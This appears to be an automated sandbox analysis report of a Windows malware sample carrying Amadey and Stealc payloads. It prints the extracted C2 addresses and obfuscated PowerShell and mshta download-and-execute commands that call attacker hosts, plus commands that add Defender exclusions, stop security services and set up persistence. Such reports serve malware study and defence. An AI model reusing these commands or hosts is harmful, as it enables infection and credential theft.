Analysis

  • max time kernel
    42s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2024 19:50

General

  • Target

    436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe

  • Size

    1.8MB

  • MD5

    da4b77594a6a31a9b1fcbabb65346fa5

  • SHA1

    ba835cb96f1e3d8267a973d147a1ccbf80fbd3c4

  • SHA256

    436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0

  • SHA512

    c9b18ab6193c0e3d84ca93ea23338447e665785f4e6c9fc6b65cc6c9aa924118fcb0d3a26a61e43432ef25c5dc412912f7cd23068cdc22528c565f75061cb687

  • SSDEEP

    49152:j++S/0Cfy6rIyGFA0F8yU/qfb7u5CpRvSM/TG5:y+89yxyGrdVfcCpRlK5

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Language
hta
Source
URLs
hta.dropper

http://176.113.115.178/Windows-Update

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/1.png

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

mars

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • UAC bypass 3 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 13 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe
    "C:\Users\Admin\AppData\Local\Temp\436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3476
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2360
      • C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe
        "C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1988
      • C:\Users\Admin\AppData\Local\Temp\1007999001\ba6bdb3357.exe
        "C:\Users\Admin\AppData\Local\Temp\1007999001\ba6bdb3357.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2260
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
          4⤵
          • Uses browser remote debugging
          PID:5736
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa35e9cc40,0x7ffa35e9cc4c,0x7ffa35e9cc58
            5⤵
              PID:5848
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2108,i,602659913440801081,6939375175462937062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:2
              5⤵
                PID:4052
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1776,i,602659913440801081,6939375175462937062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2140 /prefetch:3
                5⤵
                  PID:5740
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1860,i,602659913440801081,6939375175462937062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1604 /prefetch:8
                  5⤵
                    PID:5884
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,602659913440801081,6939375175462937062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3216 /prefetch:1
                    5⤵
                    • Uses browser remote debugging
                    PID:6108
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,602659913440801081,6939375175462937062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3380 /prefetch:1
                    5⤵
                    • Uses browser remote debugging
                    PID:5256
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4532,i,602659913440801081,6939375175462937062,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4552 /prefetch:1
                    5⤵
                    • Uses browser remote debugging
                    PID:4712
                • C:\Users\Admin\AppData\Local\Temp\service123.exe
                  "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                  4⤵
                    PID:6532
                  • C:\Windows\SysWOW64\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                    4⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:7036
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 1312
                    4⤵
                    • Program crash
                    PID:1768
                • C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe
                  "C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:1352
                  • C:\Windows\SYSTEM32\wscript.exe
                    "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
                    4⤵
                    • Checks computer location settings
                    • Suspicious use of WriteProcessMemory
                    PID:4304
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                      5⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:1384
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
                        6⤵
                        • Checks computer location settings
                        • Suspicious use of WriteProcessMemory
                        PID:4932
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
                          7⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2160
                          • C:\Windows\system32\mshta.exe
                            mshta http://176.113.115.178/Windows-Update
                            8⤵
                            • Blocklisted process makes network request
                            • Checks computer location settings
                            • Suspicious use of WriteProcessMemory
                            PID:1196
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                              9⤵
                              • UAC bypass
                              • Blocklisted process makes network request
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:5424
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                                10⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:828
                              • C:\Users\Admin\AppData\Roaming\LB31.exe
                                "C:\Users\Admin\AppData\Roaming\LB31.exe"
                                10⤵
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                • Suspicious behavior: EnumeratesProcesses
                                PID:6652
                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                  11⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:7020
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                  11⤵
                                    PID:5176
                                    • C:\Windows\system32\wusa.exe
                                      wusa /uninstall /kb:890830 /quiet /norestart
                                      12⤵
                                        PID:7064
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe stop UsoSvc
                                      11⤵
                                      • Launches sc.exe
                                      PID:1608
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                      11⤵
                                      • Launches sc.exe
                                      PID:6732
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe stop wuauserv
                                      11⤵
                                      • Launches sc.exe
                                      PID:1564
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe stop bits
                                      11⤵
                                      • Launches sc.exe
                                      PID:5780
                                    • C:\Windows\system32\sc.exe
                                      C:\Windows\system32\sc.exe stop dosvc
                                      11⤵
                                      • Launches sc.exe
                                      PID:6832
                                    • C:\Windows\system32\powercfg.exe
                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                      11⤵
                                      • Power Settings
                                      PID:5956
                                    • C:\Windows\system32\powercfg.exe
                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                      11⤵
                                      • Power Settings
                                      PID:6748
                                    • C:\Windows\system32\powercfg.exe
                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                      11⤵
                                      • Power Settings
                                      PID:1824
                                    • C:\Windows\system32\powercfg.exe
                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                      11⤵
                                      • Power Settings
                                      PID:6048
                                    • C:\Windows\system32\dialer.exe
                                      C:\Windows\system32\dialer.exe
                                      11⤵
                                        PID:440
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe delete "LIB"
                                        11⤵
                                        • Launches sc.exe
                                        PID:6504
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                                        11⤵
                                        • Launches sc.exe
                                        PID:3508
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop eventlog
                                        11⤵
                                        • Launches sc.exe
                                        PID:6528
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe start "LIB"
                                        11⤵
                                        • Launches sc.exe
                                        PID:2072
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                            5⤵
                            • Blocklisted process makes network request
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:896
                            • C:\Windows\system32\ipconfig.exe
                              "C:\Windows\system32\ipconfig.exe" /flushdns
                              6⤵
                              • Gathers network information
                              PID:1608
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                              6⤵
                              • Accesses Microsoft Outlook profiles
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              • outlook_office_path
                              • outlook_win_path
                              PID:2108
                      • C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe
                        "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:2424
                        • C:\Users\Admin\AppData\Local\Temp\is-CLKU4.tmp\FunnyJellyfish.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-CLKU4.tmp\FunnyJellyfish.tmp" /SL5="$A01FA,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"
                          4⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of WriteProcessMemory
                          PID:5656
                          • C:\Windows\SysWOW64\cmd.exe
                            "cmd.exe" /C timeout /T 3 & "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                            5⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:4200
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /T 3
                              6⤵
                              • System Location Discovery: System Language Discovery
                              • Delays execution with timeout.exe
                              PID:5200
                            • C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe
                              "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                              6⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:4344
                              • C:\Users\Admin\AppData\Local\Temp\is-B9LT7.tmp\FunnyJellyfish.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-B9LT7.tmp\FunnyJellyfish.tmp" /SL5="$A01DC,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                7⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:6952
                                • C:\Windows\SysWOW64\regsvr32.exe
                                  "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"
                                  8⤵
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:2420
                                  • C:\Windows\system32\regsvr32.exe
                                    /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"
                                    9⤵
                                    • Loads dropped DLL
                                    PID:4948
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4400
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{F05639EB-36B2-4A42-9785-97DCB6CEB638}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4796
                      • C:\Users\Admin\AppData\Local\Temp\1008011001\bb5b798a24.exe
                        "C:\Users\Admin\AppData\Local\Temp\1008011001\bb5b798a24.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5840
                      • C:\Users\Admin\AppData\Local\Temp\1008012001\41aed9b042.exe
                        "C:\Users\Admin\AppData\Local\Temp\1008012001\41aed9b042.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5272
                      • C:\Users\Admin\AppData\Local\Temp\1008013001\788f72d2ea.exe
                        "C:\Users\Admin\AppData\Local\Temp\1008013001\788f72d2ea.exe"
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:6212
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM firefox.exe /T
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5676
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM chrome.exe /T
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          PID:2412
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM msedge.exe /T
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          PID:4712
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM opera.exe /T
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          PID:4572
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /F /IM brave.exe /T
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Kills process with taskkill
                          PID:4080
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          4⤵
                            PID:4872
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                              5⤵
                              • Checks processor information in registry
                              PID:6676
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1884 -prefMapHandle 1876 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d46c04b-3ada-4158-b888-4edb688f64d2} 6676 "\\.\pipe\gecko-crash-server-pipe.6676" gpu
                                6⤵
                                  PID:5260
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2424 -prefMapHandle 2420 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14225fe6-c6e4-4b7f-a2c7-35e38b1fad92} 6676 "\\.\pipe\gecko-crash-server-pipe.6676" socket
                                  6⤵
                                    PID:3272
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3060 -childID 1 -isForBrowser -prefsHandle 3204 -prefMapHandle 2832 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e02f9ec-54e3-4cc3-b153-1d871861c9a2} 6676 "\\.\pipe\gecko-crash-server-pipe.6676" tab
                                    6⤵
                                      PID:4756
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3660 -childID 2 -isForBrowser -prefsHandle 3616 -prefMapHandle 3652 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdca4246-0e36-4ab1-8b24-435b0f86a0e6} 6676 "\\.\pipe\gecko-crash-server-pipe.6676" tab
                                      6⤵
                                        PID:872
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4168 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4212 -prefMapHandle 4208 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ca8e53c-a687-401c-a5c8-7d74d6f75d57} 6676 "\\.\pipe\gecko-crash-server-pipe.6676" utility
                                        6⤵
                                          PID:4668
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5336 -childID 3 -isForBrowser -prefsHandle 5408 -prefMapHandle 4752 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aae5cff2-a692-4998-98f5-253222628dc5} 6676 "\\.\pipe\gecko-crash-server-pipe.6676" tab
                                          6⤵
                                            PID:1588
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5604 -childID 4 -isForBrowser -prefsHandle 5680 -prefMapHandle 5496 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f29d595d-5016-4fb1-80e9-87745329365a} 6676 "\\.\pipe\gecko-crash-server-pipe.6676" tab
                                            6⤵
                                              PID:5196
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5816 -childID 5 -isForBrowser -prefsHandle 5828 -prefMapHandle 5768 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9132137-f2ae-4261-aef7-876df48de706} 6676 "\\.\pipe\gecko-crash-server-pipe.6676" tab
                                              6⤵
                                                PID:6336
                                        • C:\Users\Admin\AppData\Local\Temp\1008014001\c8807293c3.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1008014001\c8807293c3.exe"
                                          3⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
